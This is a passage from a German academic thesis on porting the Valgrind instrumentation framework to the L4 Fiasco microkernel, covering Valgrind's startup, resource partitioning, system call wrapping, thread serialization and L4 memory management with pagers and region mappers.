Das Ziel ist es, die Ausführung von Valgrinds Core, dem Tool und dem Gast
in einem Adressraum vorzubereiten. Die Tools sind statisch gelinkte Binaries.
Sie bestehen aus dem Code von Valgrinds Core und den eigentlichen Tool-Code.
Das Starten der Tools erfolgt durch den Valgrind-Loader. Unter Linux startet der
Aufruf valgrind den Valgrind-Loader. Dieser analysiert die Kommandozeilen-
Argumente und startet das gewünschte Valgrind-Tool mit Hilfe des Systemaufrufes
|execve|. Der Start des jeweiligen Tools erfolgt dabei in folgenden Schritten:
1. Valgrind wechselt auf seinen eigenen Stack.
2. Umgebung und Kommandozeilen-Argumente werden analysiert.
3. Beim Start der Speicherverwaltung wird der initiale Aufbaus des
Adressraums (siehe Abschnitt 2.7) ermittelt.
4. Valgrind lädt das Gast-Binary (Daten- und Text-Segment).
5. Das Stack- und Daten-Segment des Gastes wird vorbereitet.
18
2.5 Ressourcen-Konflikte
6. Initialisierung des Tool.
7. Initialisierung der LibVEX.
8. Initialisierung des Schedulers.
9. Laden der Debug-Informationen des Gastes.
10. Beginn der interpretierten Ausführung des Gastes.
2.5 Ressourcen-Konflikte
Bei der Ausführung von Gast und Valgrind in einem Adressraum entstehen auf-
grund der gemeinsamen Nutzung von Ressourcen Probleme [20]. Beispielsweise
führt die gemeinsame Nutzung von Ressourcen wie Speicher oder Threads zu
Konflikten. Je nach Konflikt verwendet Valgrind unterschiedliche Methoden um
ihn zu lösen:
•Partitionierung (space multiplexing ) Die gemeinsam genutzte Ressource
wird in separate Teile eingeteilt. Valgrind unterbricht alle speicherrelevan-
ten Systemaufrufe des Gastes, aktualisiert seine eigene Speicherverwaltung
und modifiziert die Argumente des Systemaufrufs. Dadurch wird die Parti-
tionierung von Speicher erreicht. Andere Ressourcen, die sich durch Parti-
tionierung gemeinsam nutzen lassen, sind zum Beispiel Datei-Deskriptoren
und Speicher.
•Zeit-Multiplexing Die Zeit, für die eine Ressource zur Verfügung steht,
wird aufgeteilt. Abwechselnd können Gast und Valgrind eine Ressource
nutzen. Beispielsweise werden die Register von CPU und FPU gemeinsam
benutzt. Um dies zu ermöglichen, werden die Inhalte in den Speicher
gesichert, nachdem Gast oder Valgrind die Register benutzt haben. Bevor
Gast oder Valgrind die Register wieder benutzen, werden die jeweiligen
Inhalte aus dem Speicher wiederhergestellt.
•Virtualisierung Hierbei wird die Ressource teilweise oder vollständig in
Software emuliert. Beispielsweise werden die „Local Descriptor Tables“ in
Verbindung mit den Segment-Registern virtualisiert.
•Sharing Einige Ressourcen können gemeinsam genutzt werden, ohne dass
dabei Konflikte entstehen. Dies sind beispielsweise Ressourcen wie die
Prozess ID, die Prozess-Struktur oder das aktuelle Verzeichnis.
19
2 Valgrind
2.6 C-Bibliothek
Valgrind ist weder von der GNU Standard C-Bibliothek noch von anderen Biblio-
theken abhängig. Fehler in der C-Bibliothek können somit die Ausführung des
Gastes auf der virtuellen CPU sowie die Ausführung von Core und Tool auf der
realen CPU nicht beeinflussen.
Damit Valgrind und das Tool trotzdem Funktionen aus der C-Bibliothek nutzen
können, stellt Valgrind Implementationen einiger wichtiger Standard-Funktionen,
wie printf() , malloc() und open() , zur Verfügung. Da Valgrind und Gast
in einem Adressraum ausgeführt werden, beginnt jede dieser Funktionen mit
einem Präfix. Dadurch soll gewährleistet werden, dass die Namen von Valgrinds
Funktionen sich von denen des Gastes unterscheiden. Allgemein beginnen al-
le Funktionen von Valgrind und Tool mit einem Präfix, um so die Ressource
„Funktionsnamen “zu partitionieren.
2.7 Speicherverwaltung in Valgrind
Da Valgrind und der Gast in einem Adressraum ausgeführt werden, ist es notwen-
dig, diesen zu partitionieren und die Nutzung zu überwachen. Das Speicherver-
waltungssystem von Valgrind verfolgt alle Änderungen im virtuellen Adressraum.
Zusätzlich steuert es alle Mappings von Valgrind und Gast, um so den Aufbau des
Adressraumes direkt zu beeinflussen.
Bei der Initialisierung des Speicherverwaltungssystemes wird der Aufbau des
Adressraums aus der virtuellen Datei /proc/self/maps gelesen. Alle folgen-
den Mappings von Valgrind bzw. Gast werden vom Speicherverwaltungssystem
gesteuert und beobachtet. Das Steuern der Mappings erfolgt durch Beobachtung
und Modifikation aller speicherrelevanten Systemaufrufe des Gastes. Beispiele für
solche Systemaufrufe sind mmap() , munmap() , brk() , mprotect() , shmat() ,
shmdt() .
2.8 Systemaufrufe des Gastes
Systemaufrufe werden auf der realen CPU durchgeführt. Dazu fängt die LibVEX
Systemaufrufe des Gastes ab und ermöglicht Valgrind, die Systemaufrufe zu
modifizieren oder zu simulieren. Um die korrekte Ausführung der Systemauf-
rufe zu gewährleisten, werden diese so ausgeführt, als wäre es der Gast selbst.
Dabei muss Valgrind sicherstellen, dass es nicht die Kontrolle über die gesamte
Programmausführung verliert.
20
2.9 Tasks und Threads in Valgrind
Um dies zu garantieren, werden Systemaufrufe in folgenden Schritten ausge-
führt:
(i) Sichern des Stackpointers von Valgrind.
(ii)Kopieren der Inhalte der virtuellen Register in die echten mit Ausnahme
des Befehlszählers, damit Valgrind die Kontrolle bei der Ausführung des
Systemaufrufes nicht verliert.
(iii) Ausführen des Systemaufrufes.
(iv) Zurückkopieren der Inhalte der echten Register in die virtuellen.
(v) Wiederherstellen des Stackpointers von Valgrind.
Valgrind und Tool können indirekt die Ausführung der Systemaufrufe des
Gastes beeinflussen. Dazu inspizieren und verändern sie Argumente und Rückga-
bewerte der Systemaufrufe oder führen den Systemaufruf gar nicht aus. Realisiert
wird dies mit Pre- und Post-Wrappern, die vor und nach dem Systemaufruf
ausgeführt werden.
Systemaufrufe dienen dem Zugriff auf Ressourcen. Um die in Abschnitt 2.5
beschriebenen Methoden zur Behandlung von Konflikten umzusetzen, können
mit den eben genannten Pre- und Post-Wrappern vor und nach dem Systemaufruf
entsprechende Aktionen durchgeführt werden.
Besondere Rücksicht ist bei blockierenden Systemaufrufen nötig. Im nächsten
Abschnitt erläutere ich, wie Valgrind mit den vom Gast erstellten Threads umgeht.
Dabei muss Valgrind die Konsistenz seiner Daten sicherstellen.
2.9 Tasks und Threads in Valgrind
Mit Valgrind können Gast-Programme mit Threads analysiert werden. Dabei
führt jeweils ein Valgrind-Thread einen Gast-Thread interpretiert aus. Außerdem
verwaltet Valgrind zu jedem vom Gast genutzten Register oder Speicherbereich
zusätzliche Daten - Shadow Values . Da die Shadow Values immer aktualisiert
werden müssen, sind Modifikationen in Registern oder im Speicher nicht mehr
atomar. Wenn also mehrere Threads des Gastes ausgeführt werden, muss die
Kohärenz der Zugriffe auf die Shadow Values gewährleistet sein.
Dazu führt Valgrind Threads nacheinander aus. Die Serialisierung wird mit
Hilfe eines Locks realisiert – nur der Thread, der das Lock besitzt, wird aus-
geführt. Spätestens nach 100.000 ausgeführten Code-Blöcken wird das Lock
abgegeben, damit andere Threads ausgeführt werden können. Probleme ergeben
21
2 Valgrind
sich bei blockierenden Systemaufrufen. Sobald ein Thread in einem Systemaufruf
blockiert, kann kein anderer Thread ausgeführt werden. Der blockierende Thread
besitzt das Lock und verhindert so, dass andere Threads ausgeführt werden
können. Um trotzdem blockierende Systemaufrufe zu ermöglichen, wird vor
deren Ausführung das Lock abgegeben. Sobald der Thread aus dem Systemaufruf
zurückkehrt, muss er das Lock wieder anfordern.
Damit Valgrind nach der Beendigung des Gastes letzte Aufgaben durchführen
kann, wird der Systemaufruf exit() durch Valgrind abgefangen. Valgrind stoppt
dann die simulierte CPU, führt letzte Aktionen aus (beispielsweise das Ausgeben
der Analyse-Ergebnisse) und beendet sich danach selbst mit dem Systemaufruf
exit() .
Die serielle Ausführung der Threads führt zu Geschwindigkeitsverlusten. Ins-
besondere auf Multi-Prozessor-Maschinen wird dadurch der Vorteil der echten
parallelen Ausführung von Threads bei Multi-Thread-Anwendungen nicht ge-
nutzt.
2.10 Funktionsersetzung, Funktionswrapping
und Anfragen des Gastes
Valgrind bietet unterschiedliche Möglichkeiten, die Ausführung des Gastes zu
beeinflussen. Umgekehrt kann aber auch der Gast Anfragen an Valgrind bzw. an
das Tool senden. Mit Hilfe von Funktionsersetzung ist es möglich, Funktionen des
Gastes vollständig zu ersetzen. Beispielsweise können Aufrufe kritischer Funktio-
nen umgeleitet werden. Außerdem kann durch Funktionswrapping vor und nach
der eigentlichen Zielfunktion Code ausgeführt werden. Dies ist sinnvoll, um Ar-
gumente und Rückgabewerte von Funktionen zu inspizieren und gegebenenfalls
zu modifizieren.
In Abbildung 2.1 stelle ich ein Beispiel für den bei Funktionsersetzung und
Funktionswrapping notwendigen Code vor. Dieser muss in Form einer dynamisch
ladbaren Bibliothek oder durch statisches Linken zum Gast hinzugefügt werden.
Das Hinzufügen des Codes hat keinen Einfluss auf die Ausführung des Gastes.
Valgrinds Core erkennt beim Lesen des Gast-Binarys diesen Code und richtet
entsprechende Funktionsweiterleitungen ein.
Außerdem haben auch Gast-Programme die Möglichkeit, Anfragen an Valgrind
oder das Tool zu senden. Mit dem Makro VALGRIND_NON_SIMD_CALL können
Funktionen des Gastes auf der realen statt auf der virtuellen CPU, also nicht
instrumentiert, ausgeführt werden.
22
2.11 Tools
#include "valgrind.h"
int
VG_REPLACE_FUNCTION_ZU(NONE , foo) ( int arg0, char *arg1 )
{
/* do something */
}
#include "valgrind.h"
int I_WRAP_SONAME_FNNAME_ZU(NONE, bar)( int arg0, char *arg1 )
{
int result;
OrigFn fn;
VALGRIND_GET_ORIG_FN(fn);
/* before calling wrapped function */
CALL_FN_W_WW(result, fn, arg0, arg1);
/* after calling wrapped function */
return result;
}
Abbildung 2.1: Code für Funktionsersetzung und Funktionswrapping
2.11 Tools
Valgrind ist ein Framework zum Erstellen von Test- und Analyse-Tools. Während
Valgrind den Gast ausführt, können die Tools den Code des Gastes instrumentieren
und somit die Ausführung beobachten und kontrollieren.
Ein Tool muss vier Funktionen zur Initialisierung, Instrumentierung und für
die Beendigung bereitstellen. Die Funktionen <toolname>_pre_clo_init()
und <toolname>_post_clo_init() dienen zur Initialisierung und werden
vor bzw. nach der Analyse der Kommandozeilen-Argumente ausgeführt. Bei der
Initialisierung können die Tools Dienste von Valgrinds Core anfordern, Funktionen
für bestimmte Ereignisse registrieren und eigene Initialisierungen durchführen.
Valgrind bietet beispielsweise Dienste für Speicherung und Ausgabe von Fehlern.
Die Funktion <toolname>_instrument() dient der Instrumentierung des
Gast-Codes. Sie wird von Valgrinds Core aufgerufen, sobald das Tool den UCode
des Gastes instrumentieren soll. Beim Instrumentieren können dem Gast-Code
Anweisungen oder Sprünge in C-Funktionen hinzugefügt werden. Das Tool kann
23
2 Valgrind
dabei jeden einzelnen Maschinenbefehl instrumentieren. Der Anfang und das
Ende jedes Maschinenbefehls ist im UCode markiert.
Am Ende der Ausführung wird die Funktion <toolname>_fini() des Tools
aufgerufen. Mit ihr können die Ergebnisse der Analyse ausgegeben werden.
Abbildung 2.2 zeigt Ausschnitte aus dem Quell-Code von Valgrinds Tool Nulgrind.
#include "pub_tool_basics.h"
#include "pub_tool_tooliface.h"
static void nl_post_clo_init(void)
{
}
static IRSB* nl_instrument ( VgCallbackClosure* closure,
IRSB* bb,
VexGuestLayout* layout,
VexGuestExtents* vge,
IRType gWordTy, IRType hWordTy ) {
return bb;
}
static void nl_fini(Int exitcode) {
return;
}
static void nl_pre_clo_init(void) {
VG_(details_name) ("Nulgrind");
VG_(details_version) (NULL);
VG_(details_description) ("a binary JIT-compiler");
VG_(details_copyright_author)(
"Copyright (C) 2002-2008, and GNU GPL'd, \
by Nicholas Nethercote.");
VG_(details_bug_reports_to) (VG_BUGS_TO);
VG_(basic_tool_funcs) (nl_post_clo_init,
nl_instrument,
nl_fini);
/* No needs, no core events to track */
}
Abbildung 2.2: Quell-Code des einfachsten Valgrind-Tools – Nulgrind
24
2.12 Valgrind in Aktion - interpretierte Ausführung des Gastes
2.12 Valgrind in Aktion - interpretierte
Ausführung des Gastes
Während der der Ausführung eines Gastes in Valgrind interagieren die LibVEX,
Valgrinds Core und das Tool. Ziel ist es, den Gast während der Laufzeit zu
untersuchen. Valgrinds Core, die LibVEX und das Tool laufen auf der realen CPU;
der Gast wird auf der in Software simulierten CPU ausgeführt. In Abbildung 2.3
ist die Ausführung des Gastes und die Interaktion von Valgrind, der LibVEX und
des Tools dargestellt.
Gast­Code
(Maschinen­Code)
Gast­Code
(Byte­Code)
Instrumentierter Gast­Code
(Byte­Code)1. Startup
2. DisassembleLibVEX
3. InstrumentationTool4. Resynthesize &ExecuteCoregrind &LibVEX
Abbildung 2.3: Interpretierte Ausführung des Gastes
Ausführungskontexte des Gastes
Der Code des Gastes wird in drei verschiedenen Kontexten ausgeführt. Je nach
Kontext hat das Tool verschiedene Möglichkeiten der Kontrolle und Beobachtung:
1.Nutzer: Der gesamte Code, den der JIT-Compiler produziert, wird im Nut-
zermodus ausgeführt. Das Tool kann den ausgeführten Code beobachten
und instrumentieren. Dabei hat das Tool die vollständige Kontrolle. Im
Nutzermodus werden der Programm-Code des Gastes, fast die gesamte
C-Bibliothek und alle anderen Bibliotheken ausgeführt.
2.Valgrind: Dieser Kontext umfasst alle Aktionen, die in Valgrind für den
Gast ausgeführt werden. Dazu gehören das Ausführen von Systemaufrufen,
das Signal-Handling, das Thread-Handling und das Scheduling. Die Tools
können diese Aktionen nicht instrumentieren. Valgrinds Core stellt für das
25
2 Valgrind
Tool Kontroll- und Beobachtungsmöglichkeiten bereit, um auch die in Val-
grinds Core ausgeführten Aktionen analysieren zu können. Beispielsweise
können vor und nach Systemaufrufen die Argumente und Rückgabewerte
modifiziert werden.
3.Kernel: Dieser Kontext umfasst alle Operationen, die im Betriebssystem-
kern ausgeführt werden. Systemaufrufe können weder vom Tool noch
von Valgrinds Core direkt beobachtet oder kontrolliert werden. Indirekt
können Systemaufrufe durch die jeweiligen Pre- und Post-Wrapper (siehe
Abschnitt 2.8) untersucht werden.
Gast und Valgrind
Valgrinds Ziel ist es, den Gast wie unter normalen Bedingungen (ohne Valgrind)
auszuführen. Da Valgrind und Gast einen Adressraum und andere Ressourcen
während der Laufzeit zusammen nutzen, muss sichergestellt werden, dass keine
Konflikte auftreten, die die Ausführung des Gastes beeinflussen könnten. Dies
geschieht durch die in Abschnitt 2.5 genannten Methoden Partitionierung, Zeit-
Multiplexing, Virtualisierung und Sharing von Ressourcen.
Ausführung des Gastes
Die Ausführung des Gastes erfolgt blockweise. Die Blöcke ( Basic Blocks ) werden
während der Ausführung von der LibVEX disassembliert, durch das Tool instru-
mentiert und von Valgrinds Core ausgeführt. Bereits übersetzte Blöcke werden in
einem Cache zwischengespeichert. Dadurch können die Geschwindigkeitsverluste,
die aufgrund der interpretierten Ausführung entstehen, gemindert werden.
Valgrinds Scheduler steuert die Ausführung des Gastes und prüft periodisch,
ob Signale ausgeliefert werden müssen oder es notwendig ist, zu einem anderen
Thread umzuschalten. Zusätzlich wird er aktiv, sobald der Gast Systemaufrufe
durchführen oder Anfragen an Valgrind senden will.
Abbildung 2.4 zeigt die Ausführung eines Programmes ohne und mit Valgrind.
Dabei kann das Programm aufgrund der nativen Ausführung direkt mit dem
System kommunizieren. Wird es in Valgrind ausgeführt, werden alle Zugriffe des
Gastes beobachtet und kontrolliert.
26
2.12 Valgrind in Aktion - interpretierte Ausführung des Gastes
OS
Maschine(Nutzermodus)Maschine(Privilegierter Modus)
Gast
OS
Maschine(Nutzermodus)Maschine(Privilegierter Modus)
Gast
Valgrind
Abbildung 2.4: Ausführung eines Programmes auf einem monolithischen System:
nativ (links) und in Valgrind (rechts).
27

3 Die Portierung
In diesem Kapitel diskutiere ich die für die Portierung von Valgrind auf L4 not-
wendigen Änderungen und die dabei getroffenen Entscheidungen. Von dem Start
Valgrinds bis hin zur interpretierten Ausführung des Gastes sind Modifikationen
aufgrund der Unterschiede zwischen Linux und L4 notwendig.
Grundlage meiner Portierung ist Valgrind mit der Version 3.4.0.SVN. Ziel ist
die Portierung auf den L4-Mikrokern Fiasco für x86.
3.1 Valgrind & L4Env
Ziel dieser Arbeit ist die Portierung von Valgrind auf L4. Das L4Env dient dabei
als Entwicklungsumgebung im Nutzermodus. In den folgenden Abschnitten gebe
ich einen Überblick über die Änderungen, die für die Portierung von Valgrind auf
L4 notwendig sind.
3.1.1 Programme im L4Env
L4Env-Programme müssen speziellen Code ausführen, bevor die main() -Funk-
tion ausgeführt werden kann. Dieser Code initialisiert Bibliotheken und startet
die initialen Threads der Task. Das ist nötig, um Subsysteme zu starten, die bei
monolithischen Systemen wie Linux im Kern laufen:
1. Parsen der Kommandozeile und initialisieren von argc , argv .
2. Initialisierung der Log-Bibliothek.
3. Initialisierung des Region-Mappers.
4. Initialisierung der Thread-Bibliothek.
5. Initialisierung der Semaphore-Bibliothek und Start des
Semaphore-Threads.
6. Start des main() -Threads.
29
3 Die Portierung
7. Start des Region-Mappers.
L4Env-Programme müssen beispielsweise Speicher und Semaphoren selbst
verwalten beziehungsweise bereitstellen. In Linux sind Speicher und Semaphoren
Aufgaben des Betriebssystemkerns.
3.1.2 Valgrind im L4Env
Unter Linux dient der Valgrind-Loader zum Starten von Valgrind. Dieser startet
entsprechend der Argumente das jeweilige Tool mit exec() . Da L4 über keine
Implementation von exec() verfügt, verwende ich den Valgrind-Loader nicht.
Stattdessen wird das jeweilige Tool in L4 direkt gestartet.
Damit Valgrind auf L4 als L4Env-Programm gestartet werden kann, muss der
im vorangegangenen Abschnitt beschriebene Start-Code des L4Env in Valgrind
integriert werden. Dies erfordert minimale Änderungen in Valgrind, einzig das
Linker-Skript von Valgrind muss angepasst werden. Bei der Initialisierung des
Region-Mappers – zuständig für Speicherverwaltung und Pagefaults – muss
diesem der Start und das Ende der Text- und Daten-Sektionen übergeben wer-
den. Der Start und das Ende der Sektionen wird im Binary mit den Symbolen
_prog_img_start und _prog_img_end markiert.
Zum Starten von Valgrind auf L4 wird als erstes der Start-Code des L4Env
ausgeführt. Anschließend verläuft der Start von Valgrind ähnlich dem unter Linux
(siehe Abschnitt 2.4):
0. Initialisierung des L4Envs (Ausführung des L4Env-Start-Codes).
1. Valgrind wechselt auf einen eigenen Stack.
2. Analyse der Umgebung und der Kommandozeilen-Argumente.
3. Start der Speicherverwaltung, dabei wird der initiale Aufbaus des
Adressraumes (siehe Abschnitt 2.7) ermittelt.
4. Laden des Gast-Binarys (Daten- und Text-Segment).
5. Vorbereitung von Stack- und Daten-Segment des Gastes.
6. Initialisierung des Tools.
7. Initialisierung der LibVEX.
8. Initialisierung des Schedulers.
30
3.1 Valgrind & L4Env
9. Laden der Debug-Informationen des Gastes.
10. Beginn der interpretierten Ausführung des Gastes.
Nach der Ausführung des L4Env-Start-Codes initialisiert Valgrind sich selbst,
lädt das Gast-Programm und bereitet die Ausführung des Gastes vor. In Abbil-
dung 3.1 ist die Ausführung eines Programmes auf L4 dargestellt. Die linke
Grafik zeigt die native Ausführung eines Programmes auf L4. Das Programm hat
direkten Zugriff auf Teile der Maschine (z.B. Register), auf andere Teile kann
nur mit Hilfe des Betriebssystems zugegriffen werden. Die rechte Grafik zeigt die
Ausführung in Valgrind. Bei dieser werden alle Zugriffe des Gastes durch Valgrind
beobachtet und kontrolliert.
OS
Maschine(Nutzermodus)Maschine(Privilegierter Modus)
Gast
OS
Maschine(Nutzermodus)Maschine(Privilegierter Modus)
Gast
Valgrind
L4Env L4Env
Abbildung 3.1: Ausführung eines Programmes auf einem mikrokern-basierten
System: nativ (links) und in Valgrind (rechts).
Als nächstes gebe ich einen Überblick über zur Portierung notwendiger Ände-
rungen in Valgrind und verweise für Details auf die entsprechenden Abschnitte.
Speicherverwaltung Valgrind ermittelt beim Start den initialen Aufbau sei-
nes Adressraumes. In Linux kommuniziert Valgrind dazu mit dem Kern, da dieser
den Adressraumes verwaltet. In L4 müssen solche Informationen, bedingt durch
den Aufbau als Multi-Server-OS, beim jeweiligen Server abgefragt werden. Den
Aufbau des Adressraumes verwaltet unter L4 der Region-Mapper. Weitere Pro-
bleme und Details der Portierung des Speicherverwaltungssystems von Valgrind
erläutere ich in Abschnitt 3.2.3.
31
3 Die Portierung
Kommunikation mit dem Kern Die LibVEX ist weitgehend unabhängig vom
Betriebssystem, daher sind nur kleine Änderungen notwendig. Um die L4-System-
aufrufe des Gastes in Valgrind behandeln zu können, muss die LibVEX modifiziert
werden. Valgrinds Core führt die Systemaufrufe des Gastes aus. In Abschnitt 3.3.2
erläutere ich dazu notwendige Modifikationen und dabei getroffene Entscheidun-
gen.
Tasks und Threads Unter L4 werden Tasks und Threads mit den Systemauf-
rufen task_new() undlthread_ex_regs() erzeugt. In Abschnitt 3.4.1 beschäftige
ich mich mit der Integration von L4-Tasks und -Threads in Valgrind.
3.1.3 C-Bibliothek, POSIX & L4
Das L4Env nutzt als C-Bibliothek die uClibc [6]. Die uClibc ist für eingebettete
Linux-Systeme konzipiert. Im Gegensatz zur Glibc ist sie wesentlich kleiner, da
nicht benötige Features deaktiviert werden können.
Um den gesamten Umfang der uClibc nutzen zu können, sind sogenannte Back-
ends notwendig. Das sind beispielsweise Funktionen zum Arbeiten mit Dateien
wie open() , read() , write() und close() . Diese stellen Funktionalität zur
Verfügung, die bei monolithischen Systemen wie Linux oder Windows im Kern
zu finden ist. Im L4Env werden diese Backends durch das L4VFS (L4 virtual file
system layer ) bereitgestellt.
Das L4VFS besteht aus Bibliotheken und Servern. Diese stellen beispielsweise
einen UNIX-artigen Namensraum, mmap() und Dateideskriptoren zur Verfügung.
Hauptziel bei der Entwicklung des L4VFS war es, die Portierung von POSIX
Programmen auf L4 zu erleichtern.
Außerdem gehört gehört zum L4VFS auch ein Server, der POSIX-Signale zur
Verfügung stellt. Da die Implementation der POSIX-Signale jedoch unvollständig
ist, unterstützt L4 /Valgrind diese nicht. Dies stellt keine Einschränkung dar, da
die meisten L4-Anwendungen keine Signale benutzen.
Valgrind ist unter Linux, wie im Abschnitt 2.6 beschrieben, unabhängig von
der C-Bibliothek. Dies ist möglich, da alle von Valgrind benötigten Ressourcen in
monolithischen Systemen vom Kern bereitgestellt werden. In L4 werden aufgrund
der Mikrokern-Architektur Ressourcen mit Servern im Nutzermodus verwaltet
und durch Bibliotheken bereitgestellt. Da L4 /Valgrind Ressourcen wie den Zu-
griff auf Dateien benötigt, ist es von Bibliotheken des L4Env abhängig. Um die
Abhängigkeit zu umgehen, könnte Valgrind auch direkt mit den Servern per IPC
kommunizieren. Dies hätte jedoch keine weiteren Vorteile.
32
3.1 Valgrind & L4Env
3.1.4 Anfragen des Gastes
Um es dem Gast zu ermöglichen, Anfragen an Valgrind oder das Tool zu senden,
muss zum Code des Gastes weiterer hinzugefügt werden. Unter Linux können mit
dem LD_PRELOAD -Mechanismus zusätzliche Bibliotheken vor der Programmaus-
führung geladen werden. L4 verfügt jedoch über keinen solchen Mechanismus.
Als Ersatz kann der zusätzliche Code, den Valgrind benötigt, um die Anfragen
des Gastes zu realisieren, in das Gast-Binary gelinkt werden.
Durch das Hinzufügen des Codes wird der eigentliche Code des Gastes nicht
verändert. Das Gast-Programm ist weiterhin direkt ohne Valgrind ausführbar.
33
3 Die Portierung
3.2 Speicherverwaltung
Valgrind und der Gast benötigen zur Laufzeit Speicher. Da Valgrind und Gast ge-
meinsam in einem Adressraum laufen, ist es notwendig, diesen zu partitionieren.
Während in Linux die Speicherverwaltung vollständig durch den Kern erfolgt,
wird in L4 der Speicher im Nutzermodus außerhalb des Kerns verwaltet.
Im Folgenden zeige ich, welche Änderungen an Valgrind deshalb notwendig
waren. Dazu stelle ich im ersten Teil vor, wie die Verwaltung von Speicher in
L4 und im L4Env erfolgt. Im zweiten Teil diskutiere ich deren Realisierung in
Valgrind.
3.2.1 Speicherverwaltung in L4
In L4 findet die Speicherverwaltung im Nutzermodus statt. Jede Anwendung hat
ihren eigenen virtuellen Adressraum, der aus Seiten zusammengesetzt ist. Spei-
cherverwaltung umfasst das Ein- und Ausblenden von Seiten und die Behandlung
von Pagefaults (Seitenfehler). Dies geschieht durch Modifikation der Seitentabel-
len, die jedoch nur durch den Kern erfolgen kann. Um die Speicherverwaltung
trotzdem im Nutzermodus durchzuführen zu können, ist also Unterstützung
durch den Kern nötig. Diese Unterstützung erfolgt durch Flexpages und Opera-
tionen, die auf diese angewendet werden können. Flexpages beschreiben Bereiche
des virtuellen Adressraumes und enthalten alle in diesen Bereich eingeblende-
ten Seiten. Das Ein- und Ausblenden von Seiten erfolgt durch Versenden von
Flexpages per IPC. Dazu stellt der Kern folgende Operationen zur Verfügung:
• grant Die Speicherseite wird an eine andere Task übergeben und steht der
ursprünglichen Task nicht mehr zur Verfügung.
• mapDie Speicherseite wird an eine andere Task übergeben und steht an-
schließend beiden beteiligten Tasks zur Verfügung.
• flush Die Speicherseite wird aus den Adressräumen aller Tasks, die Map-
pings vom Aufrufer erhalten haben, entfernt.
Pager In L4 erfolgt die Verwaltung des Speichers, also das Ein- und Ausblenden
von Seiten und die Behandlung von Pagefaults, durch Pager. Jeder L4-Thread kann
seinen eigenen Pager nutzen. Die Pager selbst sind ebenfalls separate L4-Threads.
Pagefaults werden durch den Kern mittels IPC zugestellt.
In L4 können hierarchische Pager-Strukturen konstruiert werden. Dabei wird
der Adressraum eines Pagers von einem weiteren Pager verwaltet. Die Wurzel
34
3.2 Speicherverwaltung
der Hierarchie bildet der Rootpager ( sigma0 ). Er bildet den ersten Adressraum
im System. Beim Start des Systems wird der gesamte verfügbare physische
Speicher in den Adressraum des Rootpagers eingeblendet. Dies geschieht durch
Verwendung von Flexpages und der Operation grant .
Ein wichtiger Mechanismus, den Pager nutzen, sind Pagefaults. Diese tre-
ten auf, sobald ein Programm auf Speicherseiten zugreift, denen kein Speicher
zugeordnet ist. Der Pager löst – unter Nutzung des beschriebenen Flexpage-
Mechanismus – die Pagefaults auf. Anschließend wird das Programm fortgesetzt,
das den Pagefault auslöste. In folgendem Abschnitten möchte ich den grundlegen-
den Unterschied der Behandlung von Pagefaults in mikrokern-basierten Systemen
gegenüber monolithischen Systemen erläutern.
Pagefaults In klassischen monolithischen Systemen werden Pagefaults vom
Kern aufgelöst. Abbildung 3.2 zeigt, wie Programm und Kern bei Pagefaults
interagieren. Dies läuft in drei Schritten ab:
•Schritt 1: Auftreten eines Pagefaults in einem Programm.
•Schritt 2: Behandlung des Pagefaults durch den Kern.
•Schritt 3: Fortsetzung des Programms.
Programm
Linux1 3
Pager2
Abbildung 3.2: Pagefault-Handling in Architekturen mit monolithischem Kern,
z.B. in Linux, Windows
Im Gegensatz dazu erfolgt bei mikrokern-basierten Systemen die Behandlung
eines Pagefaults im Nutzermodus [18]. Entsprechend anders läuft die Behandlung
gegenüber dem monolithischen System ab (siehe Abbildung 3.3):
•Schritt 1: Auftreten eines Pagefaults in einem Programm.
35
3 Die Portierung
•Schritt 2: Kern leitet den Pagefault in Form einer IPC an Pager weiter.
•Schritt 3: Behandlung des Pagefaults.
•Schritt 4: Pager beantwortet IPC mit Mapping.
•Schritt 5: Fortsetzen des Programms.
Programm
 Pager
Fiasco1 25 43
Abbildung 3.3: Pagefault-Handling in Mikrokern-Architekturen wie L4
3.2.2 Region-Mapper und Dataspace-Manager
Die Verwaltung von Speicher im L4Env basiert auf dem Konzept der Dataspaces.
Dataspaces sind Container für unterschiedliche Arten von Speicher, zum Beispiel
für physischen Speicher, Dateien oder I /O. Die Verwaltung von Dataspaces erfolgt
durch Dataspace-Manager; beispielsweise dient DMphys zur Verwaltung des
physischen Speichers. Dataspaces können in Bereiche (Regions) des Adressraumes
eingeblendet werden. In den Adressraum eines Programmes können mehrere
Dataspaces eingeblendet werden. Um Konflikte zu vermeiden, die beispielsweise
durch sich überlappende Dataspaces entstehen, ist es notwendig, den virtuellen
Adressraum jeder Task einzeln zu verwalten. Dazu stellt das L4Env als Pager und
Verwalter des Adressraumes den L4-Region-Mapper zur Verfügung.
Die Aufgabe des L4-Region-Mappers ist die Verwaltung des virtuellen Adress-
raumes einer Task [24]und das Auflösen von Pagefaults. Dazu verwaltet die-
ser eine Liste von Regions (Region-List), die benutzte Bereiche des Adressrau-
mes enthält. Darauf basierend bietet der Region-Mapper Funktionen zum Fin-
den und Reservieren von freien Bereichen im virtuellen Adressraum und zum
Ein- und Ausblenden von Dataspaces in Regions. Mit l4rm_do_attach() und
36
3.2 Speicherverwaltung
l4rm_detach() können beispielsweise Dataspaces in den Adressraum ein- und
ausgeblendet werden.
Neben der Verwaltung des Adressraumes fungiert der Region-Mapper als Pa-
ger. In L4, ist es möglich für jeden Thread einen anderen Pager festzulegen.
Im Falle einer L4Env-Task nutzen alle Threads den gleichen Pager. Auftreten-
de Pagefaults innerhalb einer L4Env-Task werden daher durch den Kern zum
Region-Mapper weitergeleitet. Entsprechend der Pagefault-Adresse wird der ver-
antwortliche Dataspace-Manager mit Hilfe der Region-List ermittelt; an diesen
wird der Pagefault dann weitergeleitet.
3.2.3 Valgrind, Gast und Region-Mapper
Im ersten Teil dieses Abschnittes setze ich mich mit Problemen und Lösungen
bei der Verwaltung von Speicher in Valgrind auf L4 auseinander. Im zweiten Teil
stelle ich die Implementation dessen vor.
In L4 wird Speicher, wie in Abschnitt 3.2.1 beschrieben, im Nutzermodus
verwaltet. Die Aufgaben der Speicherverwaltung sind:
1. Verwaltung des virtuellen Adressraumes und
2. Behandlung von Pagefaults.
Die Verwaltung des Speichers im L4Env wird mit dem im vorherigen Abschnitt
beschriebenen Region-Mapper realisiert. Da Valgrind eine eigene Anwendung
ist und in seinem Adressraum den Gast als vollständige Anwendung ausführt,
existieren zwei Region-Mapper in einem Adressraum. Dies führt zu Konflikten
und Problemen.
Hinzu kommt Valgrinds Speicherverwaltungssystem, das zur Vermeidung von
Konflikten bei der gemeinsamen Nutzung von Speicher durch Gast und Valgrind
dient. Dazu benötigt es die vollständige Kontrolle über alle Speicherallokationen
